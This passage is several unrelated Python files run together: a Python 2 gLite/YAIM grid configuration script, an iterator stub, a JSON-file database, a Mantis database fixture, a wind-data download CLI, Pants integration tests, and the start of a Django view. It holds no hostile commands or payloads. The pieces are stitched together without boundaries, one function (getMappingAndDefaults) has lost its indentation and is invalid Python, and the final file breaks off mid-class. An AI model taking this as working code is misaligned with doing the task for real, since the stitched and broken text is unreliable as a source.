            createParameter( tagName, tagName.lower(), 'vo.name' )
        if param == 'VOMSES':
            if value.strip() != '':
                # NOTE(review): splits on single spaces; quoted VOMSES
                # fields with embedded spaces are handled by
                # parseVomsesString elsewhere -- confirm this simple
                # split is sufficient for the values reaching here.
                updateParamNode( vo[tagName].getElementsByTagName( 'vo.name' )[0], \
                    stripQuotes( value.split( ' ' )[0] ), 'vo.name' )
                updateParamNode( vo[tagName].getElementsByTagName( 'voms.hostname' )[0], \
                    value.split( ' ' )[1], 'voms.hostname' )
                updateParamNode( vo[tagName].getElementsByTagName( 'voms.port.number' )[0], \
                    value.split( ' ' )[2], 'voms.port.number' )
                updateParamNode( vo[tagName].getElementsByTagName( 'voms.cert.subj' )[0], \
                    stripQuotes( value.split( ' ' )[3] ), 'voms.cert.subj' )
        else:
            for gParam in mapYaim2gLite ( param ):
                nodes = vo[tagName].getElementsByTagName( gParam )
                if len( nodes ) == 0:
                    createParameter( tagName, value, gParam )
                else:
                    updateParamNode( nodes[0], value, yaimName )
# glite UI set structure
def createUIsetContainer( VO ):
    """Build the gLite UI <set> element for one VO.

    Pulls the VOMS endpoints from the VO's parameter nodes (global 'vo')
    and the WMS/MyProxy endpoints from the YAIM environment.
    """
    setContainer = GliteUIsetParams( VO )
    if environ.has_key( 'WMS_HOST' ):
        setContainer.addNS( replaceParameter( environ['WMS_HOST'] ), [replaceParameter( environ['WMS_HOST'] )] )
    else:
        print "[WARNING] No WMS_HOST defined. gLite UI will not be configured !!"
    setContainer.addParameter( "ui.voms.server", getParam( vo[VO], 'voms.hostname' ) )
    setContainer.addParameter( "ui.voms.port", getParam( vo[VO], 'voms.port.number' ) )
    setContainer.addParameter( "ui.voms.cert.url", "" )
    setContainer.addParameter( "ui.voms.cert.subject", getParam( vo[VO], 'voms.cert.subj' ) )
    setContainer.addParameter( "ui.MyProxyServer", replaceParameter( environ['PX_HOST'] ) )
    setContainer.addParameter( "ui.HLRLocation", "" )
    # NOTE(review): environ['WMS_HOST'] is read again here even when the
    # has_key check above failed -- a missing WMS_HOST raises KeyError at
    # this line; confirm whether that is intended.
    setContainer.addArrayParameter( "ui.wms-proxy.endpoints", ['https://%s:7443/glite_wms_wmproxy_server' % replaceParameter( environ['WMS_HOST'] )] )
    return setContainer.getNode()
# vo, vo, ns.name, lb.name, voms.name, voms.port, voms.cert.subj, wmsproxy.endpoints, myproxy.name, hlr.location
def updateTorqueConfig( dom ):
    """Synchronise the torque server config DOM with the YAIM definitions.

    Worker-node and queue <instance> elements are kept when they appear
    in WN_LIST / QUEUES, removed otherwise, and created for new entries.
    Finally the per-queue group ACLs are rebuilt from the VO_*_QUEUES
    YAIM parameters.
    """
    print "Parsing torque configuration"
    # NOTE(review): 'instances' is collected but never used below.
    instances = dom.getElementsByTagName( 'instance' )
    yaimQueueList = replaceParameter( environ['QUEUES'] ).split( " " )
    yaimWNList = open( replaceParameter( environ['WN_LIST'] ) ).readlines()
    # Cleanup wn entries from whitespace
    tmpList = []
    for wn in yaimWNList:
        if not wn.strip() == '':
            tmpList.append( wn.strip() )
    yaimWNList = tmpList
    rootNode = dom.getElementsByTagName( 'config' )[0]
    print "Worker nodes:"
    # Keep WNs still listed in YAIM (and tick them off the list),
    # drop the <instance> of any WN that disappeared.
    for wn in dom.getElementsByTagName( 'torque-wn.name' ):
        if wn.getAttribute( 'value' ) in yaimWNList:
            print "Keeping configuration for WN " + wn.getAttribute( 'value' )
            yaimWNList.remove( wn.getAttribute( 'value' ) )
        else:
            print "Remove configuration for WN " + wn.getAttribute( 'value' )
            instanceNode = wn.parentNode.parentNode
            rootNode.removeChild( instanceNode )
    # Whatever is left in yaimWNList is new: create instances for it.
    for wn in yaimWNList:
        print "Adding configuration for WN " + wn
        rootNode.appendChild( createWNInstance( wn ) )
    print "Queues:"
    # Same keep/remove/add dance for the queues; queue_list collects the
    # surviving instance nodes so their ACLs can be updated below.
    queue_list = {}
    for queue in dom.getElementsByTagName( 'queue.name' ):
        if queue.getAttribute( 'value' ) in yaimQueueList:
            print "Keeping configuration for queue " + queue.getAttribute( 'value' )
            yaimQueueList.remove( queue.getAttribute( 'value' ) )
            queue_list[queue.getAttribute( 'value' )] = queue.parentNode
        else:
            print "Remove configuration for queue " + queue.getAttribute( 'value' )
            instanceNode = queue.parentNode.parentNode
            rootNode.removeChild( instanceNode )
    for queue in yaimQueueList:
        print "Adding configuration for queue " + queue
        queue_node = createQueueInstance( queue )
        queue_list[queue] = queue_node
        rootNode.appendChild( queue_node )
    # Set up the queue group ACLs
    acl = {}
    for param in environ:
        if param.startswith( "VO_" ) and param.endswith( "_QUEUES" ):
            vo_name = param.split( "_" )[1]
            group = getPoolName ( vo_name )[1]
            queue_names = environ[param].split( ' ' )
            acl_str = " +%s" % group
            for queue_name in queue_names:
                #print "ACL for: %s" % queue_name
                if acl.has_key( queue_name ):
                    acl[queue_name] = acl[queue_name] + acl_str
                else:
                    acl[queue_name] = acl_str
    # NOTE(review): acl[queue] raises KeyError for a queue no VO_*_QUEUES
    # parameter mentions -- confirm every queue always has an ACL entry.
    for queue in queue_list:
        updateParamNode( queue_list[queue].getElementsByTagName( 'queue.acl.groups' )[0], acl[queue], "", "Value derived from VO definition" )
# glite torque server WN structure
def createWNInstance( WN ):
    """Build a glite-wn instance element named after the worker node WN."""
    wnNode = xmlUtils.getContainerTemplate( 'glite-wn' )
    wnNode.setAttribute( 'name', WN )
    updateParamNode( wnNode.getElementsByTagName( 'torque-wn.name' )[0], WN, "", "from WN-LIST file" )
    return wnNode
def createQueueInstance( queue ):
    """Build a torque-queue instance element for the given queue name."""
    queueNode = xmlUtils.getContainerTemplate( 'torque-queue' )
    queueNode.setAttribute( 'name', 'torque-queue-%s' % queue )
    updateParamNode( queueNode.getElementsByTagName( 'queue.name' )[0], queue, 'QUEUES' )
    return queueNode
def getParam( dom, name ):
    """Return the 'value' attribute of the first element named *name*."""
    firstMatch = dom.getElementsByTagName( name )[0]
    return firstMatch.getAttribute( 'value' )
def buildUIsets( ui_conf ):
    """Replace every <set> element in the UI config DOM with one freshly
    built set per configured VO (from the global 'vo' table)."""
    ui_dom, ui_keys = ui_conf
    root = ui_dom.documentElement
    # Drop all existing <set> elements first ...
    for setNode in ui_dom.getElementsByTagName( 'set' ):
        root.removeChild( setNode )
    # ... then append a new one for each VO.
    for voName in vo:
        root.appendChild( createUIsetContainer( voName ) )
def parse_yaim( yaim_file ):
    """Parse the YAIM site-info file into the global 'environ' dict.

    Quotes are stripped globally and '#' comments removed; a line
    without '=' is treated as a continuation of the previous key's
    value.  Exits the program when the file cannot be read.
    """
    try:
        lines=open( yaim_file, 'r' ).readlines()
    except IOError:
        print "Error: Site Info file %s not found" % yaim_file
        sys.exit( 1 )
    lastkey=''
    for line in lines:
        line=line.replace( '\"', '' ).replace( '\'', '' )
        if line.find( '#' ) > -1:
            line=line[0:line.find( '#' )]
        if line.find( '=' ) > -1:
            ( key, value ) = line.split( '=', 1 )
            # value[:-1] drops the trailing newline before stripping.
            environ[key]=value[:-1].strip()
            lastkey=key
        else:
            if len( line.strip() ) > 1 and len( lastkey ) > 1:
                # Continuation line: append to the most recent key.
                # NOTE: 'key' always equals 'lastkey' here, because the
                # lastkey guard can only pass after an assignment line
                # has set both.
                environ[key]=environ[key] + " " + line[:-1].strip()
    return
def parseVomsesString( string ):
    """Split a VOMSES definition into its 5 fields, honouring quotes.

    A VOMSES value looks like:
        alias hostname port cert-subject vo-name
    where the certificate subject may be quoted and contain spaces.
    Returns the list of unquoted fields.
    """
    # NOTE(review): split[0] is never used below.
    split = [[' ','"',"'"],['"',"'"]]
    if string.count('"') + string.count("'") == 0:
        # No quoting anywhere: a plain space split is enough.
        return string.split(' ')
    ret = []
    # First three fields (alias, host, port) never contain spaces.
    tmp = string.split(" ", 3)
    for i in xrange(3):
        ret.append(stripQuotes(tmp[i]))
    tmp[3] = tmp[3].lstrip()
    if not tmp[3][0] in split[1]:
        # Unquoted subject: it ends at the next space.
        end = tmp[3].find(' ')
    else:
        # Quoted subject: it ends at the matching quote character.
        end = tmp[3][1:].find(tmp[3][0])
    ret.append(stripQuotes(tmp[3][:end]))
    # Whatever follows the subject is the VO name; the appended space
    # guarantees the final find(' ') succeeds.
    tmp[3] = stripQuotes(tmp[3][end+1:]) + ' '
    ret.append(stripQuotes(tmp[3][:tmp[3].find(' ')]))
    return ret
def getParamNames( node ):
    """Collect the tag names of all parameter elements found below every
    <parameters> container under *node*."""
    names = []
    for paramsNode in node.getElementsByTagName( 'parameters' ):
        for child in paramsNode.childNodes:
            if child.nodeType == Node.ELEMENT_NODE:
                names.append( child.nodeName )
    return names
def getMappingAndDefaults( map_file ):
try:
lines=open( map_file, 'r' ).readlines()
except IOError:
print "Error: Map file %s not found" % map_file
sys.exit( 1 )
for line in lines:
line.strip()
if line[0]!="#" and len( line ) > 1:
if line.count( '=' ) > 0:
( key, value ) = line.split( '=', 1 )
defaults[key] = value.strip()
if line.count( ':' ) > 0:
( key, value ) = line.split( ':', 1 )
map[key] = value.strip().split( ',' )
return
def parseNewVOParams( ):
    """Import per-VO YAIM parameters from <config_dir>/vo.d/<vo> files.

    Every parameter literally present in a vo.d file is exposed in the
    global 'environ' dict under the classic VO_<VO>_<PARAM> naming
    scheme, so the rest of the script can treat both formats uniformly.
    """
    # BUG FIX: replaceParameter() expects a string; it was previously
    # handed the already-split list (environ['VOS'].split()), which
    # breaks on the string operations inside replaceParameter.  Expand
    # first, then split.
    for voName in replaceParameter( environ['VOS'] ).split():
        tmpParam = {}
        voParamsFile = "%s/vo.d/%s" % (environ['config_dir'], voName.lower())
        if os.path.exists(voParamsFile):
            # Let the helper shell script expand the bash syntax, then
            # keep only parameters literally present in the vo.d file.
            envLines = os.popen("%s/../libexec/parse_bash_params %s" % (os.environ['FUNCTIONS_DIR'], voParamsFile)).readlines()
            configLines = open(voParamsFile).readlines()
            for param in envLines:
                if not (param.strip() == '' or param.strip() == '#' or param.find('=') == -1 ):
                    (p_name, p_value) = param.split("=",1)
                    tmpParam[p_name] = p_value
            for line in configLines:
                p_name = line.split("=",1)[0]
                if tmpParam.has_key(p_name):
                    # Add parameter entry following old rules.
                    # Shell forbidden characters will not cause problems since these are only Python dictionary object
                    environ["VO_%s_%s" %(voName.upper(), p_name.upper())] = tmpParam[p_name]
                    #print "Added VO_%s_%s = %s" % (voName.upper(), p_name.upper(), tmpParam[p_name])
    return
def checkArrayValues(node, value):
    """Return True if *node* has a <value> child whose text equals *value*.

    Side effect: every non-matching, non-empty <value> child is removed
    from the node, reducing the array to (at most) the wanted entry.
    """
    ret = False
    # BUG FIX: iterate over a snapshot of childNodes.  Removing children
    # from the live childNodes sequence while iterating it skips the
    # sibling that follows each removed node, leaving stale <value>
    # entries behind (and missing matches that follow a removal).
    for child in list(node.childNodes):
        if child.nodeType == Node.ELEMENT_NODE and child.nodeName == 'value':
            if child.hasChildNodes():
                if child.childNodes[0].nodeValue == value:
                    ret = True
                else:
                    child.parentNode.removeChild(child)
    return ret
def addArrayEntry(node, value):
    """Append a <value> child holding *value* unless an equal entry is
    already present (checkArrayValues also prunes non-matching ones)."""
    if checkArrayValues(node, value):
        return
    valueDoc = parseString( '<value/>' )
    valueNode = valueDoc.documentElement
    text = value.strip()
    if text != '':
        valueNode.appendChild( valueDoc.createTextNode( text ) )
    node.appendChild( valueNode )
if __name__ == '__main__':
    # Check that the required environment has been defined
    for variable in ['FUNCTIONS_DIR', 'SITE_INFO', 'NODE_TYPE_LIST' ]:
        if not os.environ.has_key( variable ):
            print "Error: %s not set." %variable
            sys.exit( 1 )
    # Global state shared by the helper functions above:
    #   vo       -- VO name -> VO container DOM element
    #   map      -- YAIM name -> list of gLite names
    #   defaults -- default parameter values from gLite.def
    #   environ  -- merged YAIM/process parameter dictionary
    vo={}
    map={}
    defaults={}
    environ={}
    # Get Mapping and default parameters
    map_file=replaceParameter(os.environ['FUNCTIONS_DIR']) + '/../libexec/gLite.def'
    getMappingAndDefaults( map_file )
    # Parse YAIM parameters
    yaim_file=os.environ['SITE_INFO']
    # NOTE(review): this rebinds 'environ' to the live os.environ mapping,
    # so the defaults merge below mutates the process environment --
    # confirm intentional.
    environ = os.environ
    # Add New VO parameters
    parseNewVOParams()
    # Merge defaults with parsed YAIM parameters
    environ.update( defaults )
    working_dir = replaceParameter( environ['GLITE_LOCATION'] ) + '/etc/config/'
    # Copy files from templates if they doesn't exist in the config dir
    templates = []
    for file in os.listdir( working_dir + 'templates' ):
        if file.endswith( '.cfg.xml' ):
            templates.append( file )
    for file in templates:
        try:
            os.stat( working_dir + file )
        except OSError:
            shutil.copy( working_dir + '/templates/%s' % file, working_dir )
    # Temporary hack
    try:
        os.remove( working_dir + 'glite-rgma-servicetool-externalServices.cfg.xml' )
        os.remove( working_dir + 'vo-list.cfg.xml' )
        os.remove( working_dir + 'glite-service-discovery.file-based-example.cfg.xml' )
        os.remove( working_dir + 'glite-ce-site-config.xml' )
        os.remove( working_dir + 'glite-lfc-client.cfg.xml' )
    except:
        pass
    # Parse all gLite configuration files
    gLiteDom = {}
    for file in templates:
        try:
            tmpDom = parse( working_dir + file )
        except IOError:
            print "Skipping file %s" % file
            continue
        # Read VO definitions from the glite-global.cfg.xml file if exist
        if file == 'glite-global.cfg.xml':
            for VO in tmpDom.getElementsByTagName( 'vo' ):
                vo[VO.getAttribute( 'name' ).lower()] = VO
                tmpDom.documentElement.removeChild( VO )
        # Update parameters if they are in templates but not in the active config file
        try:
            templateDom = parse(working_dir + "templates/" + file)
            templateParameterList = getParamNames(templateDom)
        except IOError:
            # NOTE(review): when the template is missing,
            # templateParameterList keeps the previous iteration's value
            # (or is unbound on the first pass) -- confirm.
            print "WARNING file %s has no template" % file
        parameterList = getParamNames( tmpDom )
        for parameter in templateParameterList:
            if not parameter in parameterList:
                print "Adding parameter %s into %s" % (parameter, file)
                tmpDom.getElementsByTagName( 'parameters' )[0].\
                    appendChild (templateDom.getElementsByTagName( parameter )[0])
                parameterList.append( parameter )
        gLiteDom[file] = ( tmpDom, parameterList )
    # Special treatment for condor TCP port range
    if environ.has_key( "GLOBUS_TCP_PORT_RANGE" ):
        environ['condor.LOWPORT'] =\
            multiSplit(stripQuotes( environ['GLOBUS_TCP_PORT_RANGE'] ), " ,")[0]
        environ['condor.HIGHPORT'] =\
            multiSplit(stripQuotes( environ['GLOBUS_TCP_PORT_RANGE'] ), ' ,' )[1]
    for param in environ:
        #print param
        if param.startswith( "VO_" ) and not param in ['VO_SW_DIR']:
            # Create/modify VO definition
            updateContainerParameter( param, environ[param] )
        elif param.find("_GROUP_ENABLE") > -1:
            # Handled below in the QUEUES loop.
            pass
            #for entry in environ[param].split(" "):
            #    add array entry ......
            #    addArrayEntry(vo[entry.lower()].getElementsByTagName( 'cemon.queues' )[0], \
            #        stripQuotes( param.split("_")[0].lower()))
            #    updateParamNode( vo[entry.lower()].getElementsByTagName( 'cemon.queues' )[0], \
            #        stripQuotes( param.split("_")[0].lower()), 'cemon.queues' )
        else:
            # Update parameter in all configuration files if exist
            gLiteParamList = mapYaim2gLite( param )
            for gLiteParam in gLiteParamList:
                for gDOM in gLiteDom:
                    if gLiteParam in gLiteDom[gDOM][1]:
                        nodes = gLiteDom[gDOM][0].getElementsByTagName( gLiteParam )
                        for node in nodes:
                            updateParamNode( node, environ[param], param )
    # Manage QUEUES: record each enabled queue in the cemon.queues array
    # of every VO it is enabled for.
    import string
    for queue in os.environ['QUEUES'].split(" "):
        # Queue names are normalised the YAIM way: '.'/'-' -> '_', upper-case.
        queue_ = queue.translate(string.maketrans('.-','__')).upper()
        for entry in environ["%s_GROUP_ENABLE" % queue_ ].split(" "):
            try:
                # add array entry ......
                addArrayEntry(vo[entry.lower()].getElementsByTagName( 'cemon.queues' )[0], \
                    queue.lower())
            except:
                # Should be possible to ignore it since this information is used only in TORQUE_server (not Python)
                # And publication on glite-CE (done through config_gip)
                pass
    # Check if we configure also UI
    if 'UI' in os.environ['NODE_TYPE_LIST'].split() or \
       'TAR_UI' in os.environ['NODE_TYPE_LIST'].split() or \
       'VOBOX' in os.environ['NODE_TYPE_LIST'].split():
        buildUIsets( gLiteDom['glite-ui.cfg.xml'] )
    # Write out new files and back up the old ones
    for file in templates:
        if file == 'glite-global.cfg.xml':
            # Re-attach the VO containers that were detached during parsing.
            for voCont in vo:
                gLiteDom[file][0].documentElement.appendChild( vo[voCont].cloneNode( 'deep' ) )
        try:
            os.rename( working_dir + file, working_dir + file + '.bak' )
        except OSError:
            continue
        output = open( working_dir + file, 'w' )
        gliteXMLWriter().write( gLiteDom[file][0], output )
        output.close()
    sys.exit( 0 )
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 10 00:17:40 2016
@author: alex
"""
#Base class which other iterators will inherit from
class Iterator(object):
    """Base class which concrete scene iterators inherit from.

    :param Scene obj: internal scene object the iterator walks over
    :param String name: human-readable iterator name
    """

    def __init__(self, obj, name):
        self.obj = obj
        self.name = name

    def get_name(self):
        """Return this iterator's name."""
        return self.name
# """
# :param Method function: The function to recurse
# """
# def iterate(self, function):
# pass
#This is implemented and called in each successive iterator to determine how iterations happen
#--------Example of passing function down the stack--------
# class Foo(object):
# def method1(self):
# pass
# def method2(self, method):
# return method()
#
# foo = Foo()
# foo.method2(foo.method1)
#
#From http://stackoverflow.com/questions/706721/how-do-i-pass-a-method-as-a-parameter-in-python#706735 |
import os
import json
from datetime import date
from simple_database.exceptions import ValidationError
from simple_database.config import BASE_DB_FILE_PATH
class Row(object):
    """Lightweight record: exposes every key of *row* as an attribute."""

    def __init__(self, row):
        for field, field_value in row.items():
            setattr(self, field, field_value)
class Table(object):
    """A single table, persisted as one JSON file inside the db directory.

    File layout: {'columns': <columns config>, 'rows': [<row dict>, ...]}
    """

    def __init__(self, db, name, columns=None):
        self.db = db
        self.name = name
        self.table_filepath = os.path.join(BASE_DB_FILE_PATH, self.db.name,
                                           '{}.json'.format(self.name))

        # In case the table JSON file doesn't exist already, initialize it
        # as an empty table, with this JSON structure:
        # {'columns': columns, 'rows': []}
        if not os.path.exists(self.table_filepath):
            # BUG FIX: mode 'r+' raises FileNotFoundError when the file
            # does not exist yet; 'w' creates it.
            with open(self.table_filepath, 'w') as f:
                initial_structure = {'columns': columns, 'rows': []}
                f.write(json.dumps(initial_structure))

        self.columns = columns or self._read_columns()

    def _read_columns(self):
        """Return the columns configuration stored in the table's JSON file."""
        with open(self.table_filepath, 'r') as f:
            return json.load(f)['columns']

    def insert(self, *args):
        # Validate that the provided row data is correct according to the
        # columns configuration.
        # If there's any error, raise ValidationError exception.
        # Otherwise, serialize the row as a string, and write it to the
        # table's JSON file.
        # NOTE(review): left unimplemented -- the exact validation rules
        # (column/type representation, error messages) are not visible
        # from this file; confirm the expected contract before coding it.
        pass

    def query(self, **kwargs):
        """Yield a Row for each stored row whose fields match all kwargs."""
        with open(self.table_filepath, 'r') as f:
            rows = json.load(f)['rows']
        for row in rows:
            if all(row.get(field) == value for field, value in kwargs.items()):
                yield Row(row)

    def all(self):
        """Return a generator of Row objects over every stored row."""
        # query() with no filters matches everything.
        return self.query()

    def count(self):
        """Return the number of rows currently stored in the table."""
        with open(self.table_filepath, 'r') as f:
            table_rows = json.load(f)['rows']
        return len(table_rows)

    def describe(self):
        """Return the columns configuration read from the JSON file."""
        return self._read_columns()
class DataBase(object):
    """A database: a directory holding one JSON file per table.

    Each table is also exposed as an attribute of the DataBase object
    (db.my_table), mirroring the names listed in self.tables.
    """

    def __init__(self, name):
        self.name = name
        self.db_filepath = os.path.join(BASE_DB_FILE_PATH, self.name)
        self.tables = self._read_tables()

    @classmethod
    def create(cls, name):
        """Create the db directory; raise ValidationError if it already exists."""
        db_filepath = os.path.join(BASE_DB_FILE_PATH, name)
        if os.path.exists(db_filepath):
            error_msg = 'Database with name "{}" already exists.'.format(name)
            raise ValidationError(error_msg)
        os.makedirs(db_filepath)

    def _read_tables(self):
        """Instantiate a Table per .json file in the db directory, attach
        each as an attribute, and return the list of table names."""
        database_tables = [filename.split('.')[0]
                           for filename in os.listdir(self.db_filepath)
                           if filename.endswith('.json')]
        for table in database_tables:
            setattr(self, table, Table(db=self, name=table))
        return database_tables

    def create_table(self, table_name, columns):
        """Create a new table; raise ValidationError when the name is taken."""
        if table_name in self._read_tables():
            error_msg = 'Table with name "{}" already exists.'.format(table_name)
            raise ValidationError(error_msg)
        # BUG FIX: the columns configuration was dropped (Table was built
        # without it), so new tables were persisted with columns=None.
        table = Table(db=self, name=table_name, columns=columns)
        setattr(self, table_name, table)
        self.tables.append(table_name)

    def show_tables(self):
        """Return the current list of table names."""
        return self.tables
def create_database(db_name):
    """Create a brand new database on disk and return a connection to it."""
    DataBase.create(db_name)
    return connect_database(db_name)
def connect_database(db_name):
    """Open an existing database and return its connection object."""
    return DataBase(name=db_name)
# -*- coding: utf-8 -*-
import random
from test_adds import adjustement
import pymysql.cursors
# import mysql.connector
from model.project import Project
class DbFixture:
    """Thin wrapper around a pymysql connection to the Mantis database."""

    def __init__(self, host, name, user, password):
        self.host = host
        self.name = name
        self.user = user
        self.password = password
        self.connection = pymysql.connect(host=host, database=name, user=user, password=password, autocommit=True)

    def get_project_list(self):
        """Return every project from mantis_project_table, with line
        breaks removed from the description."""
        projects = []
        cursor = self.connection.cursor()
        # TODO: check whether a 'with' statement could replace try/finally here
        try:
            cursor.execute('select name, status, inherit_global, view_state, description from mantis_project_table')
            for (name, status, inherit_categories, view_status, description) in cursor:
                projects.append(Project(name=name, status=status,
                                        inherit_categories=inherit_categories,
                                        view_status=view_status,
                                        description=adjustement.delete_break_line_DB(description)))
        finally:
            cursor.close()
        return projects

    def get_one_project(self):
        """Return one randomly chosen project from mantis_project_table."""
        projects = []
        cursor = self.connection.cursor()
        # TODO: check whether a 'with' statement could replace try/finally here
        try:
            cursor.execute('select name, status, inherit_global, view_state, description from mantis_project_table')
            for (name, status, inherit_categories, view_status, description) in cursor:
                projects.append(
                    Project(name=name, status=status, inherit_categories=inherit_categories,
                            view_status=view_status, description=description))
        finally:
            cursor.close()
        return random.choice(projects)

    def destroy(self):
        """Close the underlying database connection."""
        self.connection.close()
import logging
from datetime import datetime
from powersimdata.input.grid import Grid
from prereise.cli.constants import (
DATE_FMT,
END_DATE_HELP_STRING,
FILE_PATH_HELP_STRING,
GRID_MODEL_DEFAULT,
GRID_MODEL_HELP_STRING,
REGION_CHOICES,
START_DATE_HELP_STRING,
)
from prereise.cli.data_sources.data_source import DataSource
from prereise.cli.helpers import validate_date, validate_file_path
from prereise.gather.winddata.rap import impute, rap
class WindDataRapidRefresh(DataSource):
    """CLI data source that downloads RAP (Rapid Refresh) wind speed data
    for the wind farms of a grid model and stores it as a pickle file."""

    @property
    def command_name(self):
        """See :py:func:`prereise.cli.data_sources.data_source.DataSource.command_name`

        :return: (*str*)
        """
        return "wind_data_rap"

    @property
    def command_help(self):
        """See :py:func:`prereise.cli.data_sources.data_source.DataSource.command_help`

        :return: (*str*)
        """
        return "Download wind data from National Centers for Environmental Prediction"

    @property
    def extract_arguments(self):
        """See :py:func:`prereise.cli.data_sources.data_source.DataSource.extract_arguments`

        :return: (*list*) -- argparse argument definitions for this command
        """
        return [
            {
                "command_flags": ["--region", "-r"],
                "required": True,
                "choices": REGION_CHOICES,
                "type": str,
                # 'append' allows the flag to be repeated for multiple regions.
                "action": "append",
            },
            {
                "command_flags": ["--start_date", "-sd"],
                "required": True,
                "type": validate_date,
                "help": START_DATE_HELP_STRING,
            },
            {
                "command_flags": ["--end_date", "-ed"],
                "required": True,
                "type": validate_date,
                "help": END_DATE_HELP_STRING,
            },
            {
                "command_flags": ["--file_path", "-fp"],
                "required": True,
                "type": validate_file_path,
                "help": FILE_PATH_HELP_STRING,
            },
            {
                "command_flags": ["--grid_model", "-gm"],
                "required": False,
                "default": GRID_MODEL_DEFAULT,
                "choices": list(Grid.SUPPORTED_MODELS),
                "help": GRID_MODEL_HELP_STRING,
            },
            {
                "command_flags": ["--no_impute", "-ni"],
                "action": "store_true",
                "help": "Flag used to avoid naive gaussian imputing of missing data",
            },
        ]

    def extract(
        self, region, start_date, end_date, file_path, grid_model, no_impute, **kwargs
    ):
        """See :py:func:`prereise.cli.data_sources.data_source.DataSource.extract`

        :param list region: list of regions to download wind farm data for
        :param str start_date: date designating when to start the data download
        :param str end_date: date designating when to end the data download
        :param str file_path: file location on local filesystem on where to store the data
        :param str grid_model: .mat file path for a grid model or a string supported by
            `powersimdata.input.grid.Grid.SUPPORTED_MODELS`
        :param bool no_impute: flag used to avoid naive gaussian imputing of missing data
        """
        # Fail fast on an inverted date range before any downloading starts.
        assert datetime.strptime(start_date, DATE_FMT) <= datetime.strptime(
            end_date, DATE_FMT
        )
        grid = Grid(region, source=grid_model)
        wind_farms = grid.plant.groupby("type").get_group("wind")
        data, missing = rap.retrieve_data(
            wind_farms, start_date=start_date, end_date=end_date
        )
        if len(missing) > 0:
            logging.warning(f"There are {len(missing)} files missing")
        # Imputing any missing data in place
        if not no_impute:
            logging.warning("Performing naive gaussian imputing of missing data")
            impute.gaussian(data, wind_farms, inplace=True)
        data.to_pickle(file_path)
|
# Copyright 2023 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from textwrap import dedent
import pytest
from pants.testutil.pants_integration_test import run_pants, setup_tmpdir
def test_system_binary_and_adhoc_tool() -> None:
    """End-to-end check: an adhoc_tool running a system_binary (`cat`)
    over a file dependency surfaces the file's contents in the log."""
    sources = {
        "src/test_file.txt": dedent(
            """\
            I am a duck.
            """
        ),
        "src/BUILD": dedent(
            """\
            files(name="files", sources=["*.txt",])
            system_binary(
                name="cat",
                binary_name="cat",
            )
            adhoc_tool(
                name="adhoc",
                runnable=":cat",
                execution_dependencies=[":files",],
                args=["test_file.txt",],
                log_output=True,
                stdout="stdout",
            )
            """
        ),
    }
    with setup_tmpdir(sources) as tmpdir:
        args = [
            "--backend-packages=['pants.backend.experimental.adhoc',]",
            f"--source-root-patterns=['{tmpdir}/src']",
            "export-codegen",
            f"{tmpdir}/src:adhoc",
        ]
        result = run_pants(args)
        # log_output=True routes the tool's stdout into pants' INFO log.
        assert "[INFO] I am a duck." in result.stderr.strip()
@pytest.mark.parametrize(
    ("fingerprint,passes"),
    (
        # Exact match of the fingerprint command's output.
        (r"Binary Name v6\.32\.1", True),
        # Loose regex that still matches.
        (r"(.*)v6\.(.*)", True),
        # Non-matching version: the binary must not be resolved.
        (r"Binary Name v6\.99999\.1", False),
    ),
)
def test_fingerprint(fingerprint: str, passes: bool) -> None:
    """A system_binary resolves only when its `fingerprint` regex matches
    the output of `fingerprint_args`; otherwise dependent goals fail."""
    sources = {
        "src/BUILD": dedent(
            f"""\
            system_binary(
                name="bash",
                binary_name="bash",
                fingerprint=r"{fingerprint}",
                fingerprint_args=("-c", "echo Binary Name v6.32.1",),
            )
            adhoc_tool(
                name="adhoc",
                runnable=":bash",
                args=["-c","echo I am a duck!"],
                log_output=True,
                stdout="stdout",
            )
            """
        ),
    }
    with setup_tmpdir(sources) as tmpdir:
        args = [
            "--backend-packages=['pants.backend.experimental.adhoc',]",
            f"--source-root-patterns=['{tmpdir}/src']",
            "export-codegen",
            f"{tmpdir}/src:adhoc",
        ]
        result = run_pants(args)
        if passes:
            assert result.exit_code == 0
            assert "[INFO] I am a duck!" in result.stderr.strip()
        else:
            assert result.exit_code != 0
            assert "Could not find a binary with name `bash`" in result.stderr.strip()
def test_runnable_dependencies() -> None:
    """`runnable_dependencies` puts the extra binary (`awk`) on the PATH
    of the adhoc_tool's sandbox so the bash script can invoke it."""
    sources = {
        "src/BUILD": dedent(
            """\
            system_binary(
                name="bash",
                binary_name="bash",
            )
            system_binary(
                name="awk",
                binary_name="awk",
                fingerprint_args=["--version"],
                fingerprint=".*",
            )
            adhoc_tool(
                name="adhoc",
                runnable=":bash",
                runnable_dependencies=[":awk",],
                args=["-c", "awk 'BEGIN {{ print \\"I am a duck.\\" }}'"],
                log_output=True,
                stdout="stdout",
            )
            """
        ),
    }
    with setup_tmpdir(sources) as tmpdir:
        args = [
            "--backend-packages=['pants.backend.experimental.adhoc',]",
            f"--source-root-patterns=['{tmpdir}/src']",
            "export-codegen",
            f"{tmpdir}/src:adhoc",
        ]
        result = run_pants(args)
        assert "[INFO] I am a duck." in result.stderr.strip()
def test_external_env_vars() -> None:
    """`extra_env_vars` forwards a variable from the pants process
    environment into the adhoc_tool's sandbox."""
    sources = {
        "src/BUILD": dedent(
            """\
            system_binary(
                name="bash",
                binary_name="bash",
            )
            adhoc_tool(
                name="adhoc",
                runnable=":bash",
                args=["-c", "echo $ENVVAR"],
                log_output=True,
                stdout="stdout",
                extra_env_vars=["ENVVAR"],
            )
            """
        ),
    }
    with setup_tmpdir(sources) as tmpdir:
        args = [
            "--backend-packages=['pants.backend.experimental.adhoc',]",
            f"--source-root-patterns=['{tmpdir}/src']",
            "export-codegen",
            f"{tmpdir}/src:adhoc",
        ]
        # The value set here must appear in the tool's logged stdout.
        extra_env = {"ENVVAR": "clang"}
        result = run_pants(args, extra_env=extra_env)
        assert "[INFO] clang" in result.stderr.strip()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from django.http import HttpResponse
from django.views.generic import TemplateView, ListView, DetailView
from django.db.models import Q
from priv.models import User, Role, Permission
# See search write up: https://wsvincent.com/django-search/
# logging.basicConfig() self.logger = logging.getLogger('logger')
# = list(obj.translations.all().values_list('pk', flat=True))
class QueryParser():
    """Parse the free-text 'q' GET parameter into Django Q filters.

    Supported term prefixes: role:, permission:, first:, last:, acct:.
    Unprefixed terms match against first/last/account name.
    """

    def __init__(self, view):
